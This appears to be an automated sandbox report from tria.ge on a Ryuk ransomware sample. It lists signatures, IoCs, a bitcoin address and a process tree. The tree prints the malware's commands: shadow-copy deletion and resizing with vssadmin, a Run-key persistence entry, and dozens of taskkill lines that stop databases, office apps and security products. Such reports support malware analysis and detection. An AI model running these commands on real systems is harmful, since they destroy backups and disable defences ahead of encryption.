Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
126s -
max time network
21s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
17/04/2021, 13:15
Static task
static1
Behavioral task
behavioral1
Sample
dll64.dll
Resource
win7v20210408
Behavioral task
behavioral2
Sample
dll64.dll
Resource
win10v20210410
Behavioral task
behavioral3
Sample
svchost.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
svchost.exe
Resource
win10v20210410
General
-
Target
svchost.exe
Malware Config
Extracted
C:\RyukReadMe.txt
ryuk
15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
pid Process 1688 aCBlj.exe -
Deletes itself 1 IoCs
pid Process 1688 aCBlj.exe -
Loads dropped DLL 1 IoCs
pid Process 1240 svchost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\users\\Public\\aCBlj.exe" reg.exe -
Enumerates connected drives 3 TTPs 8 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1652 set thread context of 1240 1652 svchost.exe 26 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF Dwm.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\RyukReadMe.txt taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH02313_.WMF taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml Dwm.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo Dwm.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo taskhost.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv Dwm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd Dwm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00603_.WMF Dwm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-options.xml_hidden taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar Dwm.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\RyukReadMe.txt Dwm.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png Dwm.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png taskhost.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png taskhost.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\RMNSQUE.INF taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\RyukReadMe.txt taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR48B.GIF taskhost.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png Dwm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240157.WMF Dwm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_OFF.GIF taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\HEADINGBB.POC taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Tags.accft taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif Dwm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar taskhost.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif Dwm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar taskhost.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png Dwm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309904.WMF Dwm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml Dwm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties Dwm.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay Dwm.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\RyukReadMe.txt taskhost.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR49B.GIF taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\Built-In Building Blocks.dotx taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00276_.WMF Dwm.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif taskhost.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_COL.HXC taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV.HXS taskhost.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport.wmv Dwm.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka Dwm.exe File opened for modification C:\Program Files (x86)\Common Files\RyukReadMe.txt Dwm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml taskhost.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\RyukReadMe.txt Dwm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\RyukReadMe.txt taskhost.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar Dwm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Aspect.thmx taskhost.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF taskhost.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\RyukReadMe.txt Dwm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01255G.GIF Dwm.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt taskhost.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png taskhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 15 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2152 vssadmin.exe 1804 vssadmin.exe 1724 vssadmin.exe 3052 vssadmin.exe 1776 vssadmin.exe 2280 vssadmin.exe 652 vssadmin.exe 1784 vssadmin.exe 2696 vssadmin.exe 1656 vssadmin.exe 2112 vssadmin.exe 2388 vssadmin.exe 2304 vssadmin.exe 1580 vssadmin.exe 2348 vssadmin.exe -
Kills process with taskkill 44 IoCs
pid Process 2264 taskkill.exe 2508 taskkill.exe 2544 taskkill.exe 2876 taskkill.exe 2924 taskkill.exe 2108 taskkill.exe 2956 taskkill.exe 1668 taskkill.exe 556 taskkill.exe 2152 taskkill.exe 2336 taskkill.exe 2600 taskkill.exe 2816 taskkill.exe 1404 taskkill.exe 1468 taskkill.exe 1792 taskkill.exe 328 taskkill.exe 2068 taskkill.exe 2756 taskkill.exe 616 taskkill.exe 1896 taskkill.exe 1840 taskkill.exe 540 taskkill.exe 2380 taskkill.exe 2420 taskkill.exe 2628 taskkill.exe 1596 taskkill.exe 876 taskkill.exe 1244 taskkill.exe 2708 taskkill.exe 2944 taskkill.exe 2496 taskkill.exe 2764 taskkill.exe 2288 taskkill.exe 664 taskkill.exe 3000 taskkill.exe 2208 taskkill.exe 2296 taskkill.exe 2460 taskkill.exe 3028 taskkill.exe 2272 taskkill.exe 2016 taskkill.exe 2060 taskkill.exe 1372 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1688 aCBlj.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1688 aCBlj.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 1372 taskkill.exe Token: SeDebugPrivilege 876 taskkill.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeDebugPrivilege 1896 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 616 taskkill.exe Token: SeDebugPrivilege 664 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 540 taskkill.exe Token: SeDebugPrivilege 1792 taskkill.exe Token: SeDebugPrivilege 328 taskkill.exe Token: SeDebugPrivilege 2068 taskkill.exe Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 2296 taskkill.exe Token: SeDebugPrivilege 2152 taskkill.exe Token: SeDebugPrivilege 2264 taskkill.exe Token: SeDebugPrivilege 2336 taskkill.exe Token: SeDebugPrivilege 2380 taskkill.exe Token: SeDebugPrivilege 2544 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 2420 taskkill.exe Token: SeDebugPrivilege 2628 taskkill.exe Token: SeDebugPrivilege 2508 taskkill.exe Token: SeDebugPrivilege 2944 taskkill.exe Token: SeDebugPrivilege 2600 taskkill.exe Token: SeDebugPrivilege 2708 taskkill.exe Token: SeDebugPrivilege 2756 taskkill.exe Token: SeDebugPrivilege 3028 taskkill.exe Token: SeDebugPrivilege 2816 taskkill.exe Token: SeDebugPrivilege 2876 taskkill.exe Token: SeDebugPrivilege 2924 taskkill.exe Token: SeDebugPrivilege 3000 taskkill.exe Token: SeDebugPrivilege 2108 taskkill.exe Token: SeDebugPrivilege 2272 taskkill.exe Token: SeDebugPrivilege 2764 taskkill.exe Token: SeDebugPrivilege 2496 taskkill.exe Token: SeDebugPrivilege 2956 taskkill.exe Token: SeDebugPrivilege 1596 taskkill.exe Token: SeDebugPrivilege 1404 taskkill.exe Token: SeDebugPrivilege 2288 taskkill.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 2060 taskkill.exe Token: SeDebugPrivilege 556 taskkill.exe Token: SeDebugPrivilege 1688 aCBlj.exe Token: SeBackupPrivilege 1312 vssvc.exe Token: SeRestorePrivilege 1312 vssvc.exe Token: SeAuditPrivilege 1312 vssvc.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 1124 taskhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1652 wrote to memory of 1240 1652 svchost.exe 26 PID 1240 wrote to memory of 1688 1240 svchost.exe 28 PID 1240 wrote to memory of 1688 1240 svchost.exe 28 PID 1240 wrote to memory of 1688 1240 svchost.exe 28 PID 1240 wrote to memory of 1688 1240 svchost.exe 28 PID 1688 wrote to memory of 1372 1688 aCBlj.exe 31 PID 1688 wrote to memory of 1372 1688 aCBlj.exe 31 PID 1688 wrote to memory of 1372 1688 aCBlj.exe 31 PID 1688 wrote to memory of 876 1688 aCBlj.exe 33 PID 1688 wrote to memory of 876 1688 aCBlj.exe 33 PID 1688 wrote to memory of 876 1688 aCBlj.exe 33 PID 1688 wrote to memory of 1468 1688 aCBlj.exe 35 PID 1688 wrote to memory of 1468 1688 aCBlj.exe 35 PID 1688 wrote to memory of 1468 1688 aCBlj.exe 35 PID 1688 wrote to memory of 1896 1688 aCBlj.exe 37 PID 1688 wrote to memory of 1896 1688 aCBlj.exe 37 PID 1688 wrote to memory of 1896 1688 aCBlj.exe 37 PID 1688 wrote to memory of 1840 1688 aCBlj.exe 39 PID 1688 wrote to memory of 1840 1688 aCBlj.exe 39 PID 1688 wrote to memory of 1840 1688 aCBlj.exe 39 PID 1688 wrote to memory of 664 1688 aCBlj.exe 41 PID 1688 wrote to memory of 664 1688 aCBlj.exe 41 PID 1688 wrote to memory of 664 1688 aCBlj.exe 41 PID 1688 wrote to memory of 616 1688 aCBlj.exe 43 PID 1688 wrote to memory of 616 1688 aCBlj.exe 43 PID 1688 wrote to memory of 616 1688 aCBlj.exe 43 PID 1688 wrote to memory of 1244 1688 aCBlj.exe 45 PID 1688 wrote to memory of 1244 1688 aCBlj.exe 45 PID 1688 wrote to memory of 1244 1688 aCBlj.exe 45 PID 1688 wrote to memory of 1668 1688 aCBlj.exe 47 PID 1688 wrote to memory of 1668 1688 aCBlj.exe 47 PID 1688 wrote to memory of 1668 1688 aCBlj.exe 47 PID 1688 wrote to memory of 540 1688 aCBlj.exe 49 PID 1688 wrote to memory of 540 1688 aCBlj.exe 49 PID 1688 wrote to memory of 540 1688 aCBlj.exe 49 PID 1688 wrote to memory of 1792 1688 aCBlj.exe 51 PID 1688 wrote to memory of 1792 1688 aCBlj.exe 51 PID 1688 wrote to memory of 1792 1688 aCBlj.exe 51 PID 1688 wrote to memory of 328 1688 aCBlj.exe 54 PID 1688 wrote to memory of 328 1688 aCBlj.exe 54 PID 1688 wrote to memory of 328 1688 aCBlj.exe 54 PID 1688 wrote to memory of 2068 1688 aCBlj.exe 55 PID 1688 wrote to memory of 2068 1688 aCBlj.exe 55 PID 1688 wrote to memory of 2068 1688 aCBlj.exe 55 PID 1688 wrote to memory of 2152 1688 aCBlj.exe 58 PID 1688 wrote to memory of 2152 1688 aCBlj.exe 58 PID 1688 wrote to memory of 2152 1688 aCBlj.exe 58 PID 1688 wrote to memory of 2208 1688 aCBlj.exe 59 PID 1688 wrote to memory of 2208 1688 aCBlj.exe 59 PID 1688 wrote to memory of 2208 1688 aCBlj.exe 59 PID 1688 wrote to memory of 2264 1688 aCBlj.exe 62 PID 1688 wrote to memory of 2264 1688 aCBlj.exe 62 PID 1688 wrote to memory of 2264 1688 aCBlj.exe 62
Processes
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Drops file in Program Files directory
PID:1184 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"2⤵PID:2664
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2696
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3052
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1656
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1776
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2280
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2112
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1804
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1124 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"2⤵PID:2876
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1724
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2388
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2348
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2152
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:652
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2304
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1580
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1784
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\users\Public\aCBlj.exe"C:\users\Public\aCBlj.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- Executes dropped EXE
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM excel.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:616
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM infopath.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM onenote.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM oracle.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM outlook.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM steam.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM synctime.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM visio.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM winword.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F4⤵
